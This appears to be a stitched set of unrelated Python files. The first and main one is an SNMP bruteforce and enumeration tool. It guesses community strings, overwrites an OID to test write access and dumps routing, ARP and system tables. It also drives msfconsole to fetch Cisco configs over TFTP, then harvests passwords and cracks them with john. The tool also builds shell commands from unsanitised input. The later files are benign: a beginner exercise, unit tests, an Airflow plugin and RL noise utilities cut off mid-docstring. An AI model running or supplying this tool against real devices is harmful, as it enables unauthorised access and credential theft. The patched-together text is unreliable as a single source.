https://github.com/allfro/sploitego/blob/master/src/sploitego/scapytools/snmp.py
'''
v1 = 0
v2c = 1
v3 = 2
@classmethod
def iversion(cls, v):
if v in ['v1', '1']:
return cls.v1
elif v in ['v2', '2', 'v2c']:
return cls.v2c
elif v in ['v3', '3']:
return cls.v3
raise ValueError('No such version %s' % v)
@classmethod
def sversion(cls, v):
if not v:
return 'v1'
elif v == 1:
return 'v2c'
elif v == 2:
return 'v3'
raise ValueError('No such version number %s' % v)
class SNMPBruteForcer(object):
#This class is used for the sploitego method of bruteforce (--sploitego)
'''Credits
Class copied from sploitego project
__original_author__ = 'Nadeem Douba'
https://github.com/allfro/sploitego/blob/master/src/sploitego/scapytools/snmp.py
'''
def __init__(self, agent, port=161, version='v2c', timeout=0.5, rate=1000):
self.version = SNMPVersion.iversion(version)
self.s = socket(AF_INET, SOCK_DGRAM)
self.s.settimeout(timeout)
self.addr = (agent, port)
self.rate = rate
def guess(self, communities):
p = SNMP(
version=self.version,
PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1.1.0'))])
)
r = []
for c in communities:
i = randint(0, 2147483647)
p.PDU.id = i
p.community = c
self.s.sendto(str(p), self.addr)
sleep(1/self.rate)
while True:
try:
p = SNMP(self.s.recvfrom(65535)[0])
except timeout:
break
r.append(p.community.val)
return r
def __del__(self):
self.s.close()
class SNMPResults:
addr=''
version=''
community=''
write=False
def __eq__(self, other):
return self.addr == other.addr and self.version == other.version and self.community == other.community
##########################################################################################################
# Colour output functions
##########################################################################################################
# for color output
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
#following from Python cookbook, #475186
def has_colours(stream):
if not hasattr(stream, "isatty"):
return False
if not stream.isatty():
return False # auto color only on TTYs
try:
import curses
curses.setupterm()
return curses.tigetnum("colors") > 2
except:
# guess false in case of error
return False
has_colours = has_colours(sys.stdout)
def printout(text, colour=WHITE):
if has_colours and defaults.colour:
seq = "\x1b[1;%dm" % (30+colour) + text + "\x1b[0m\n"
sys.stdout.write(seq)
else:
#sys.stdout.write(text)
print text
##########################################################################################################
#
##########################################################################################################
def banner(art=True):
if art:
print >> sys.stderr, " _____ _ ____ _______ ____ __ "
print >> sys.stderr, " / ___// | / / |/ / __ \\ / __ )_______ __/ /____ "
print >> sys.stderr, " \\__ \\/ |/ / /|_/ / /_/ / / __ / ___/ / / / __/ _ \\"
print >> sys.stderr, " ___/ / /| / / / / ____/ / /_/ / / / /_/ / /_/ __/"
print >> sys.stderr, "/____/_/ |_/_/ /_/_/ /_____/_/ \\__,_/\\__/\\___/ "
print >> sys.stderr, ""
print >> sys.stderr, "SNMP Bruteforce & Enumeration Script " + __version__
print >> sys.stderr, "http://www.secforce.com / nikos.vassakis <at> secforce.com"
print >> sys.stderr, "###############################################################"
print >> sys.stderr, ""
def listener(sock,results):
while True:
try:
response,addr=SNMPrecv(sock)
except timeout:
continue
except KeyboardInterrupt:
break
except:
break
r=SNMPResults()
r.addr=addr
r.version=SNMPVersion.sversion(response.version.val)
r.community=response.community.val
results.append(r)
printout (('%s : %s \tVersion (%s):\t%s' % (str(addr[0]),str(addr[1]), SNMPVersion.sversion(response.version.val),response.community.val)),WHITE)
def SNMPrecv(sock):
try:
recv,addr=sock.recvfrom(65535)
response = SNMP(recv)
return response,addr
except:
raise
def SNMPsend(sock, packets, ip, port=defaults.port, community='', rate=defaults.rate):
addr = (ip, port)
for packet in packets:
i = randint(0, 2147483647)
packet.PDU.id = i
packet.community = community
sock.sendto(str(packet), addr)
sleep(1/rate)
def SNMPRequest(result,OID, value='', TimeOut=defaults.timeOut):
s = socket(AF_INET, SOCK_DGRAM)
s.settimeout(TimeOut)
response=''
r=result
version = SNMPVersion.iversion(r.version)
if value:
p = SNMP(
version=version,
PDU=SNMPset(varbindlist=[SNMPvarbind(oid=ASN1_OID(OID), value=value)])
)
else:
p = SNMP(
version=version,
PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID(OID))])
)
SNMPsend(s,p,r.addr[0],r.addr[1],r.community)
for x in range(0, 5):
try:
response,addr=SNMPrecv(s)
break
except timeout: # if request times out retry
sleep(0.5)
continue
    s.close()
if not response:
raise timeout
return response
def testSNMPWrite(results,options,OID='.1.3.6.1.2.1.1.4.0'):
#Alt .1.3.6.1.2.1.1.5.0
setval='HASH(0xDEADBEF)'
for r in results:
try:
originalval=SNMPRequest(r,OID)
if originalval:
originalval=originalval[SNMPvarbind].value.val
SNMPRequest(r,OID,setval)
curval=SNMPRequest(r,OID)[SNMPvarbind].value.val
if curval == setval:
r.write=True
try:
SNMPRequest(r,OID,originalval)
except timeout:
pass
if options.verbose: printout (('\t %s (%s) (RW)' % (r.community,r.version)),GREEN)
curval=SNMPRequest(r,OID)[SNMPvarbind].value.val
if curval != originalval:
printout(('Couldn\'t restore value to: %s (OID: %s)' % (str(originalval),str(OID))),RED)
else:
if options.verbose: printout (('\t %s (%s) (R)' % (r.community,r.version)),BLUE)
else:
r.write=None
printout (('\t %s (%s) (Failed)' % (r.community,r.version)),RED)
except timeout:
r.write=None
printout (('\t %s (%s) (Failed!)' % (r.community,r.version)),RED)
continue
def generic_snmpwalk(snmpwalk_args,oids):
for key, val in oids.items():
try:
printout(('################## Enumerating %s Table using: %s (%s)'%(key,val[0],val[1])),YELLOW)
entry={}
out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+' | cut -d\'=\' -f 2').readlines()
print '\tINFO'
print '\t----\t'
for i in out:
print '\t',i.strip()
print '\n'
except KeyboardInterrupt:
pass
def enumerateSNMPWalk(result,options):
r=result
snmpwalk_args=' -c "'+r.community+'" -'+r.version+' '+str(r.addr[0])+':'+str(r.addr[1])
############################################################### Enumerate OS
if options.windows:
generic_snmpwalk(snmpwalk_args,WINDOWS_OIDS)
return
if options.linux:
generic_snmpwalk(snmpwalk_args,LINUX_OIDS)
return
if options.cisco:
generic_snmpwalk(snmpwalk_args,CISCO_OIDS)
############################################################### Enumerate CISCO Specific
############################################################### Enumerate Routes
entry={}
out=os.popen('snmpwalk'+snmpwalk_args+' '+'.1.3.6.1.2.1.4.21.1.1'+' '+'| awk \'{print $NF}\' 2>&1''').readlines()
lines = len(out)
printout('################## Enumerating Routing Table (snmpwalk)',YELLOW)
try:
for key, val in RouteOIDS.items(): #Enumerate Routes
#print '\t *',val[1], val[0]
out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+'| awk \'{print $NF}\' 2>&1').readlines()
entry[val[1]]=out
print '\tDestination\t\tNext Hop\tMask\t\t\tMetric\tInterface\tType\tProtocol\tAge'
print '\t-----------\t\t--------\t----\t\t\t------\t---------\t----\t--------\t---'
for j in range(lines):
print( '\t'+entry['Destination'][j].strip().ljust(12,' ') +
'\t\t'+entry['Next Hop'][j].strip().ljust(12,' ') +
'\t'+entry['Mask'][j].strip().ljust(12,' ') +
'\t\t'+entry['Metric'][j].strip().center(6,' ') +
'\t'+entry['Interface'][j].strip().center(10,' ') +
'\t'+entry['Route type'][j].strip().center(4,' ') +
'\t'+entry['Route protocol'][j].strip().center(8,' ') +
'\t'+entry['Route age'][j].strip().center(3,' ')
)
except KeyboardInterrupt:
pass
############################################################### Enumerate Arp
print '\n'
for key, val in ARPOIDS.items():
try:
printout(('################## Enumerating ARP Table using: %s (%s)'%(val[0],val[1])),YELLOW)
entry={}
out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+' | cut -d\'=\' -f 2 | cut -d\':\' -f 2').readlines()
lines=len(out)/3
entry['V']=out[0*lines:1*lines]
entry['MAC']=out[1*lines:2*lines]
entry['IP']=out[2*lines:3*lines]
print '\tIP\t\tMAC\t\t\tV'
print '\t--\t\t---\t\t\t--'
for j in range(lines):
print( '\t'+entry['IP'][j].strip().ljust(12,' ') +
'\t'+entry['MAC'][j].strip().ljust(18,' ') +
'\t'+entry['V'][j].strip().ljust(2,' ')
)
print '\n'
except KeyboardInterrupt:
pass
############################################################### Enumerate SYSTEM
for key, val in OIDS.items():
try:
printout(('################## Enumerating %s Table using: %s (%s)'%(key,val[0],val[1])),YELLOW)
entry={}
out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+' | cut -d\'=\' -f 2').readlines()
print '\tINFO'
print '\t----\t'
for i in out:
print '\t',i.strip()
print '\n'
except KeyboardInterrupt:
pass
############################################################### Enumerate Interfaces
for key, val in snmpstat_args.items():
try:
printout(('################## Enumerating %s Table using: %s (%s)'%(key,val[0],val[1])),YELLOW)
out=os.popen('snmpnetstat'+snmpwalk_args+' '+val[0]).readlines()
for i in out:
print '\t',i.strip()
print '\n'
except KeyboardInterrupt:
pass
def get_cisco_config(result,options):
printout(('################## Trying to get config with: %s'% result.community),YELLOW)
identified_ip=os.popen('ifconfig eth0 |grep "inet addr:" |cut -d ":" -f 2 |awk \'{ print $1 }\'').read()
if options.interactive:
Local_ip = raw_input('Enter Local IP ['+str(identified_ip).strip()+']:') or identified_ip.strip()
else:
Local_ip = identified_ip.strip()
if not (os.path.isdir("./output")):
os.popen('mkdir output')
p=Popen('msfconsole -x "use auxiliary/scanner/snmp/cisco_config_tftp; set RHOSTS '+str(result.addr[0])+'; set LHOST '+str(Local_ip)+'; set COMMUNITY '+result.community+'; set OUTPUTDIR ./output; set RETRIES 1; set RPORT '+str(result.addr[1])+'; set THREADS 5; set VERSION '+result.version.replace('v','')+'; run; exit -y" ',shell=True,stdin=PIPE,stdout=PIPE, stderr=PIPE) #>/dev/null 2>&1
print 'msfconsole -x "use auxiliary/scanner/snmp/cisco_config_tftp; set RHOSTS '+str(result.addr[0])+'; set LHOST '+str(Local_ip)+'; set COMMUNITY '+result.community+'; set OUTPUTDIR ./output; set RETRIES 1; set RPORT '+str(result.addr[1])+'; set THREADS 5; set VERSION '+result.version.replace('v','')+'; run; exit -y" '
out=[]
while p.poll() is None:
line=p.stdout.readline()
out.append(line)
print '\t',line.strip()
printout('################## Passwords Found:',YELLOW)
encrypted=[]
for i in out:
if "Password" in i:
print '\t',i.strip()
if "Encrypted" in i:
encrypted.append(i.split()[-1])
if encrypted:
print '\nCrack encrypted password(s)?'
for i in encrypted:
print '\t',i
#if (False if raw_input("(Y/n):").lower() == 'n' else True):
if not get_input("(Y/n):",'n',options):
with open('./hashes', 'a') as f:
for i in encrypted:
f.write(i+'\n')
p=Popen('john ./hashes',shell=True,stdin=PIPE,stdout=PIPE,stderr=PIPE)
while p.poll() is None:
print '\t',p.stdout.readline()
print 'Passwords Cracked:'
out=os.popen('john ./hashes --show').readlines()
for i in out:
print '\t', i.strip()
out=[]
while p.poll() is None:
line=p.stdout.readline()
out.append(line)
print '\t',line.strip()
def select_community(results,options):
default=None
try:
printout("\nIdentified Community strings",WHITE)
for l,r in enumerate(results):
if r.write==True:
printout ('\t%s) %s %s (%s)(RW)'%(l,str(r.addr[0]).ljust(15,' '),str(r.community),str(r.version)),GREEN)
default=l
elif r.write==False:
printout ('\t%s) %s %s (%s)(RO)'%(l,str(r.addr[0]).ljust(15,' '),str(r.community),str(r.version)),BLUE)
else:
printout ('\t%s) %s %s (%s)'%(l,str(r.addr[0]).ljust(15,' '),str(r.community),str(r.version)),RED)
if default is None:
default = l
if not options.enum:
return
if options.interactive:
selection=raw_input("Select Community to Enumerate ["+str(default)+"]:")
if not selection:
selection=default
else:
selection=default
try:
return results[int(selection)]
except:
return results[l]
except KeyboardInterrupt:
exit(0)
def SNMPenumeration(result,options):
getcisco=defaults.getcisco
try:
printout (("\nEnumerating with READ-WRITE Community string: %s (%s)" % (result.community,result.version)),YELLOW)
enumerateSNMPWalk(result,options)
if options.windows or options.linux:
if not get_input("Get Cisco Config (y/N):",'y',options):
getcisco=False
if getcisco:
get_cisco_config(result,options)
except KeyboardInterrupt:
print '\n'
return
def password_bruteforce(options, communities, ips):
s = socket(AF_INET, SOCK_DGRAM)
s.settimeout(options.timeOut)
results=[]
#Start the listener
T = threading.Thread(name='listener', target=listener, args=(s,results,))
T.start()
# Craft SNMP's for both versions
p1 = SNMP(
version=SNMPVersion.iversion('v1'),
PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1.1.0'))])
)
p2c = SNMP(
version=SNMPVersion.iversion('v2c'),
PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1.1.0'))])
)
packets = [p1, p2c]
#We try each community string
for i,community in enumerate(communities):
#sys.stdout.write('\r{0}'.format('.' * i))
#sys.stdout.flush()
for ip in ips:
SNMPsend(s, packets, ip, options.port, community.rstrip(), options.rate)
#We read from STDIN if necessary
if options.stdin:
while True:
try:
try:
community=raw_input().strip('\n')
for ip in ips:
SNMPsend(s, packets, ip, options.port, community, options.rate)
except EOFError:
break
except KeyboardInterrupt:
break
try:
print "Waiting for late packets (CTRL+C to stop)"
sleep(options.timeOut+options.delay) #Waiting in case of late response
except KeyboardInterrupt:
pass
T._Thread__stop()
    s.close()
#We remove any duplicates. This relies on the __equal__
newlist = []
for i in results:
if i not in newlist:
newlist.append(i)
return newlist
def get_input(string,non_default_option,options):
#(True if raw_input("Enumerate with different community? (Y/n):").lower() == 'n' else False)
if options.interactive:
if raw_input(string).lower() == non_default_option:
return True
else:
return False
else:
print string
return False
def main():
parser = optparse.OptionParser(formatter=optparse.TitledHelpFormatter())
parser.set_usage("python snmp-brute.py -t <IP> -f <DICTIONARY>")
#parser.add_option('-h','--help', help='Show this help message and exit', action=parser.print_help())
parser.add_option('-f','--file', help='Dictionary file', dest='dictionary', action='store')
parser.add_option('-t','--target', help='Host IP', dest='ip', action='store')
parser.add_option('-p','--port', help='SNMP port', dest='port', action='store', type='int',default=defaults.port)
groupAlt = optparse.OptionGroup(parser, "Alternative Options")
groupAlt.add_option('-s','--stdin', help='Read communities from stdin', dest='stdin', action='store_true',default=False)
groupAlt.add_option('-c','--community', help='Single Community String to use', dest='community', action='store')
groupAlt.add_option('--sploitego', help='Sploitego\'s bruteforce method', dest='sploitego', action='store_true',default=False)
groupAuto = optparse.OptionGroup(parser, "Automation")
groupAuto.add_option('-b','--bruteonly', help='Do not try to enumerate - only bruteforce', dest='enum', action='store_false',default=True)
groupAuto.add_option('-a','--auto', help='Non Interactive Mode', dest='interactive', action='store_false',default=True)
groupAuto.add_option('--no-colours', help='No colour output', dest='colour', action='store_false',default=True)
groupAdvanced = optparse.OptionGroup(parser, "Advanced")
groupAdvanced.add_option('-r','--rate', help='Send rate', dest='rate', action='store',type='float', default=defaults.rate)
groupAdvanced.add_option('--timeout', help='Wait time for UDP response (in seconds)', dest='timeOut', action='store', type='float' ,default=defaults.timeOut)
groupAdvanced.add_option('--delay', help='Wait time after all packets are send (in seconds)', dest='delay', action='store', type='float' ,default=defaults.delay)
groupAdvanced.add_option('--iplist', help='IP list file', dest='lfile', action='store')
groupAdvanced.add_option('-v','--verbose', help='Verbose output', dest='verbose', action='store_true',default=False)
groupOS = optparse.OptionGroup(parser, "Operating Systems")
groupOS.add_option('--windows', help='Enumerate Windows OIDs (snmpenum.pl)', dest='windows', action='store_true',default=False)
groupOS.add_option('--linux', help='Enumerate Linux OIDs (snmpenum.pl)', dest='linux', action='store_true',default=False)
groupOS.add_option('--cisco', help='Append extra Cisco OIDs (snmpenum.pl)', dest='cisco', action='store_true',default=False)
parser.add_option_group(groupAdvanced)
parser.add_option_group(groupAuto)
parser.add_option_group(groupOS)
parser.add_option_group(groupAlt)
(options, arguments) = parser.parse_args()
communities=[]
ips=[]
banner(options.colour) #For SPARTA!!!
if not options.ip and not options.lfile:
#Can't continue without target
parser.print_help()
exit(0)
else:
# Create the list of targets
if options.lfile:
try:
with open(options.lfile) as t:
ips = t.read().splitlines() #Potential DoS
except:
print "Could not open targets file: " + options.lfile
exit(0)
else:
ips.append(options.ip)
if not options.colour:
defaults.colour=False
# Create the list of communities
if options.dictionary: # Read from file
with open(options.dictionary) as f:
communities=f.read().splitlines() #Potential DoS
elif options.community: # Single community
communities.append(options.community)
elif options.stdin: # Read from input
communities=[]
else: #if not options.community and not options.dictionary and not options.stdin:
        communities = defaults.default_communities
#We ensure that default communities are included
#if 'public' not in communities:
# communities.append('public')
#if 'private' not in communities:
# communities.append('private')
if options.stdin:
options.interactive=False
results=[]
if options.stdin:
print >> sys.stderr, "Reading input for community strings ..."
else:
print >> sys.stderr, "Trying %d community strings ..." % len(communities)
if options.sploitego: #sploitego method of bruteforce
if ips:
for ip in ips:
for version in ['v1', 'v2c']:
bf = SNMPBruteForcer(ip, options.port, version, options.timeOut,options.rate)
result=bf.guess(communities)
for i in result:
r=SNMPResults()
r.addr=(ip,options.port)
r.version=version
r.community=i
results.append(r)
print ip, version+'\t',result
else:
parser.print_help()
else:
        results = password_bruteforce(options, communities, ips)
#We identify whether the community strings are read or write
if results:
printout("\nTrying identified strings for READ-WRITE ...",WHITE)
testSNMPWrite(results,options)
else:
printout("\nNo Community strings found",RED)
exit(0)
#We attempt to enumerate the router
while options.enum:
SNMPenumeration(select_community(results,options),options)
#if (True if raw_input("Enumerate with different community? (Y/n):").lower() == 'n' else False):
if get_input("Enumerate with different community? (y/N):",'y',options):
continue
else:
break
if not options.enum:
select_community(results,options)
print "Finished!"
if __name__ == "__main__":
main()
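# Example invocations (illustrative; flags as defined in main() above):
#   python snmp-brute.py -t 192.168.1.1 -f dict.txt          # dictionary bruteforce
#   python snmp-brute.py -t 192.168.1.1 -c private --cisco   # single community, Cisco OIDs
#   python snmp-brute.py --iplist targets.txt -a -b          # non-interactive, bruteforce only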
|
python
|
nasc = int(input('Ano de nascimento: '))
idade = 2018 - nasc
if idade <= 9:
print('Categoria: Mirim')
elif idade <= 14:
print('Categoria: Infantil')
elif idade <= 19:
print('Categoria: Júnior')
elif idade <= 20:
print('Categoria: Sênior')
elif idade >= 21:
print('Categoria: Master')
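# Variant sketch (not part of the original exercise): derive the reference year
# from the system clock instead of hard-coding 2018:
#     from datetime import date
#     idade = date.today().year - nasc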
|
python
|
#!/usr/bin/env python
# coding:utf-8
"""
Test functionality of Service elements.
"""
# -- standard library ---------------------------------------------------------
from cgi import parse_header, FieldStorage
from threading import Thread
import unittest
import tempfile
import zipfile
import socket
import json
import sys
import os
# -- Third-party imports ------------------------------------------------------
import requests
# --Modules to test -----------------------------------------------------------
from VestaService import (Document, Message, RemoteAccess,
annotations_dispatcher)
from VestaService.service_exceptions import DownloadError
if sys.version_info >= (3, 1):
from http.server import BaseHTTPRequestHandler, HTTPServer
else:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
CURRENT_DIR = os.path.dirname(__file__)
TEST_DOC_DURATION = 19.9375
PROCESS_DURATION = 2.0 # Processing time in seconds.
class MockServerRequestHandler(BaseHTTPRequestHandler):
"""
Mock server to test the submit_annotation function
"""
def do_POST(self):
'''
Process an HTTP POST request and return a response with the length of
the data received. If the data is zipped, unzip it on the disk and
check the length of the unzipped data.
'''
ctype, pdict = parse_header(self.headers['content-type'])
# Handling unzipped data
if ctype == "application/json":
content_len = int(self.headers.get("Content-Length"))
post_body = self.rfile.read(content_len)
body = json.loads(post_body.decode('utf-8'))
if body["data"] is not None:
self.send_response(requests.codes.ok)
self.send_header("Content-Type", "application/json")
self.end_headers()
self.wfile.write('{{"Content-Length" : {} }}'.
format(content_len).encode('utf-8'))
else:
self.send_response(requests.codes.bad)
self.end_headers()
# Handling zipped data
elif ctype == "multipart/form-data":
form = FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.headers['Content-Type'],
})
filename = form['file'].filename
if filename != "annotations.zip":
self.send_response(requests.codes.bad)
else:
data = form['file'].file.read()
temp_file_path = os.path.join(tempfile.gettempdir(),
"test.zip")
with open(temp_file_path, "wb") as zip_file:
zip_file.write(data)
with zipfile.ZipFile(temp_file_path, "r") as zippy:
infolist = zippy.infolist()
if len(infolist) != 1:
self.send_response(requests.codes.bad)
else:
self.send_response(requests.codes.ok)
self.send_header("Content-Type", "application/json")
self.end_headers()
self.wfile.write('{{"Content-Length" : {} }}'.
format(infolist[0].file_size).
encode('utf-8'))
os.remove(temp_file_path)
def get_free_port():
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(('localhost', 0))
address, port = s.getsockname()
s.close()
return port
# -- fixtures ----------------------------------------------------------------
class TestUtilities(unittest.TestCase):
"""
Test utility modules.
"""
def setUp(self):
self.mock_server_port = get_free_port()
self.mock_server = HTTPServer(('localhost', self.mock_server_port),
MockServerRequestHandler)
# Start running mock server in a separate thread.
# Daemon threads automatically shut down when the main process exits.
self.mock_server_thread = Thread(target=self.mock_server.serve_forever)
        self.mock_server_thread.daemon = True
self.mock_server_thread.start()
def tearDown(self):
self.mock_server.server_close()
def test_document_creation(self):
"""
Check structure of Document instance.
"""
some_url = 'http://www.crim.ca'
some_path = __file__
doc = Document.Document(url=some_url, path=some_path)
self.assertEqual(doc.url, some_url)
self.assertEqual(doc.local_path, some_path)
def test_blank_message_creation(self):
"""
Validate message contents after creating blank message.
"""
msg = Message.request_message_factory()
self.assertTrue('request_time' in msg)
self.assertTrue('service' in msg)
self.assertTrue('annotation_service' in msg)
def test_download(self):
"""
Check download function
"""
MAX_TRY = 1
        # Testing the error raised when the response code != 200
        doc_msg = {"url": "http://www.crim.ca/page_inconnue"}
        with self.assertRaises(DownloadError):
            RemoteAccess.download(doc_msg, max_try=MAX_TRY)
# Testing the size of the data written on the disk
doc_msg = {"url": "https://httpbin.org/stream-bytes/1024"}
doc = RemoteAccess.download(doc_msg, max_try=MAX_TRY)
self.assertEqual(os.stat(doc.local_path).st_size, 1024)
RemoteAccess.cleanup(doc)
doc_msg = {"url": "https://httpbin.org/bytes/1024"}
doc = RemoteAccess.download(doc_msg, max_try=MAX_TRY)
self.assertEqual(os.stat(doc.local_path).st_size, 1024)
RemoteAccess.cleanup(doc)
def test_submit_annotations(self):
"""
Check the annotations_dispatcher.submit_annotation function
:return:
"""
post_url = "http://localhost:{}".format(self.mock_server_port)
annotations = [{"annotation": "annotation"}]
# Sending the annotations zipped
result = annotations_dispatcher.submit_annotations(post_url,
annotations, True)
self.assertEqual(result.status_code, 200)
zip_resp = json.loads(result.content.decode('utf-8'))
# Sending the annotations unzipped
result = annotations_dispatcher.submit_annotations(post_url,
annotations, False)
self.assertEqual(result.status_code, 200)
no_zip_resp = json.loads(result.content.decode('utf-8'))
# Checking that the length of the data sent by both method is the same
self.assertEqual(zip_resp["Content-Length"],
no_zip_resp["Content-Length"])
if __name__ == '__main__':
unittest.main()
|
python
|
import unittest
from PySide2.QtWidgets import QApplication
from qtimgren.main_window import MainWindow
from unittest.mock import Mock, patch
import qtimgren.main_window
import qtimgren.about
import qtimgren.profile
import qtimgren.profiles
class TestMainWindow(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
cls.app = QApplication.instance()
if cls.app is None:
cls.app = QApplication()
def setUp(self) -> None:
self.window = MainWindow()
self.window.show()
def tearDown(self) -> None:
self.window.close()
def test_about(self):
about = Mock(qtimgren.about.About)
about.exec_ = Mock()
about.exec = about.exec_
with patch.object(qtimgren.main_window, 'About') as About:
About.return_value = about
action = self.window.action_about
action.triggered.emit()
about.exec_.assert_called_once_with()
def test_about_qt(self):
with patch.object(qtimgren.main_window, 'QApplication') as qApp:
action = self.window.action_about_qt
action.triggered.emit()
qApp.aboutQt.assert_called_once_with()
def test_close(self):
self.assertTrue(self.window.isVisible())
action = self.window.action_quit
action.triggered.emit()
self.assertFalse(self.window.isVisible())
def test_new_profile(self):
dialog = Mock(qtimgren.profile.ProfileDialog)
with patch.object(self.window, 'profile_manager') as pm, \
patch.object(qtimgren.main_window, 'ProfileDialog') as Dialog:
pm.names.return_value = ['a', 'b']
Dialog.return_value = dialog
dialog.exec_ = Mock()
dialog.exec = dialog.exec_
dialog.exec_.return_value = 1
action = self.window.action_new_profile
action.triggered.emit()
Dialog.assert_called_once_with(self.window, names=['a', 'b'])
dialog.exec_.assert_called_once_with()
pm.add_from_dialog.assert_called_once_with(dialog)
def test_manage_profiles(self):
dialog = Mock(qtimgren.profiles.ProfilesDialog)
with patch.object(self.window, 'profile_manager') as pm, \
patch.object(qtimgren.main_window, 'ProfilesDialog') as Dialog:
Dialog.return_value = dialog
dialog.exec_.return_value = 1
dialog.model = Mock()
dialog.exec = Mock()
dialog.exec_ = dialog.exec
action = self.window.action_manage_profiles
action.triggered.emit()
Dialog.assert_called_once_with(pm.profiles, self.window)
dialog.exec.assert_called_once_with()
pm.reset_profiles.assert_called_once_with(dialog.model.profiles)
if __name__ == '__main__':
unittest.main()
|
python
|
from airflow.plugins_manager import AirflowPlugin
from freshdesk_plugin.operators.freshdesk_to_s3_operator import FreshdeskToS3Operator
class freshdesk_plugin(AirflowPlugin):
name = "freskdesk_plugin"
operators = [FreshdeskToS3Operator]
hooks = []
# Leave in for explicitness
executors = []
macros = []
admin_views = []
flask_blueprints = []
menu_links = []
|
python
|
import numpy as np
import random
import matplotlib.pyplot as plt
from collections import deque
class UniformNoise(object):
def __init__(self, action_space, initial_exploration = 0.99, final_exploration = 0.05, decay_rate = 0.999):
self.action_dim = action_space.shape[0] # Requires Space with (10,) shape!
self.low = action_space.low
self.high = action_space.high
self.distance = abs(self.low - self.high)
self.initial_exploration = initial_exploration
self.final_exploration = final_exploration
self.decay_rate = decay_rate
def reset(self):
self.state = np.ones(self.action_dim)
def get_action(self, action, step = 0):
decay = self.decay_rate ** step
        exploration_probability = decay*self.initial_exploration + (1-decay)*self.final_exploration
        # Exploration Probability
        explore_yes = np.random.binomial(1, exploration_probability)
# Unnormalized Uniform Numbers
noise_list = np.random.uniform(self.low, self.high ,size=self.action_dim) #used self.low/10 before
#Renormalize
#sum_noise = noise_list.sum()
noisy_action = explore_yes * noise_list + (1 - explore_yes) * action
return noisy_action
# Ornstein-Ulhenbeck Process, Taken from #https://github.com/vitchyr/rlkit/blob/master/rlkit/exploration_strategies/ou_strategy.py
class OUNoise(object):
def __init__(self, action_space, mu=0.0, theta=0.15, max_sigma=0.3, min_sigma=0.3, decay_period=100000):
self.mu = mu
self.theta = theta
self.sigma = max_sigma
self.max_sigma = max_sigma
self.min_sigma = min_sigma
self.decay_period = decay_period
#BiddingMarket_energy_Environment Params
self.action_dim = action_space.shape[0]
self.low = action_space.low
self.high = action_space.high
# only relevant for Discrete action_space
if len(self.low) > 3:
self.low = 0
self.high = 1
self.reset()
def reset(self):
self.state = np.ones(self.action_dim) * self.mu
def evolve_state(self):
x = self.state
dx = self.theta * (self.mu - x) + self.sigma * np.random.randn(self.action_dim)
self.state = x + dx
return self.state
def get_action(self, action, t=0):
ou_state = self.evolve_state()
self.sigma = self.max_sigma - (self.max_sigma - self.min_sigma) * min(1.0, t / self.decay_period)
return np.clip(action + ou_state, self.low, self.high)
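# --- Hedged usage sketch (added for illustration; not part of the original code) ---
# Shows how OUNoise above might be driven inside an action-selection loop.
# The Box-like action space built with SimpleNamespace is a stand-in assumption;
# in practice a gym.spaces.Box (or similar) would be passed instead.
def _example_ou_noise_usage():
    from types import SimpleNamespace
    space = SimpleNamespace(shape=(2,), low=np.zeros(2), high=np.ones(2))
    noise = OUNoise(space, max_sigma=0.3, min_sigma=0.05, decay_period=1000)
    noise.reset()
    action = np.array([0.5, 0.5])  # stand-in policy output
    noisy = action
    for t in range(3):
        # sigma is annealed with t; the result is clipped to [low, high]
        noisy = noise.get_action(action, t)
    return noisy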
class Memory:
def __init__(self, max_size):
self.max_size = max_size
self.buffer = deque(maxlen=max_size)
def push(self, state, action, reward, next_state, done):
experience = (state, action, reward, next_state, done)
self.buffer.append(experience)
def sample(self, batch_size):
state_batch = []
action_batch = []
reward_batch = []
next_state_batch = []
done_batch = []
batch = random.sample(self.buffer, batch_size)
for experience in batch:
state, action, reward, next_state, done = experience
state_batch.append(state)
action_batch.append(action)
reward_batch.append(reward)
next_state_batch.append(next_state)
done_batch.append(done)
return state_batch, action_batch, reward_batch, next_state_batch, done_batch
def __len__(self):
return len(self.buffer)
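# --- Hedged usage sketch (added for illustration; not part of the original code) ---
# Demonstrates the push/sample cycle of the replay buffer above with dummy
# transitions; the state and action shapes are arbitrary assumptions.
def _example_memory_usage():
    memory = Memory(max_size=100)
    dummy_state = np.zeros(3)
    dummy_action = np.zeros(1)
    for _ in range(10):
        memory.push(dummy_state, dummy_action, reward=0.0,
                    next_state=dummy_state, done=False)
    states, actions, rewards, next_states, dones = memory.sample(batch_size=4)
    assert len(states) == 4 and len(memory) == 10
    return states, actions, rewards, next_states, dones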
class GaussianNoise(object):
def __init__(self, action_space, mu = 0.0, sigma = 0.1, regulation_coef = 1, decay_rate = 0):
self.action_dim = action_space.shape[0]
self.low = action_space.low
self.high = action_space.high
# only relevant for Discrete action_space
if len(self.low) > 3:
self.low = 0
self.high = 1
self.distance = abs(self.low - self.high)
self.decay_rate = decay_rate
self.regulation_coef = regulation_coef
self.mu = mu
self.sigma = sigma
self.reset()
def reset(self):
self.state = np.ones(self.action_dim) * self.mu
def get_action(self, action, step = 0):
noise_list = np.random.normal(self.mu, self.sigma, self.action_dim)* ((1 - self.decay_rate)**step) * self.regulation_coef
        if np.all(np.abs(noise_list) < 0.01):  # elementwise check avoids the ambiguous array truth value
noise_list = np.random.normal(0,0.01,self.action_dim)
noisy_action = np.clip(action + noise_list, self.low, self.high)
return noisy_action
def plot_run_outcome(data, number_of_agents, bid_limit, NE, episodes, run, curves = 'both',
title = 'Bidding Game',rescale=[1,1,1], moving_window = 9):
    '''
    Plots actions, rewards or both (curves = 'actions', 'rewards' or 'both').
    Reads the necessary data from a dictionary (structured like in 'main').
    It is possible to display the bid limit and a Nash Equilibrium (NE) threshold (NE can also be 'none').
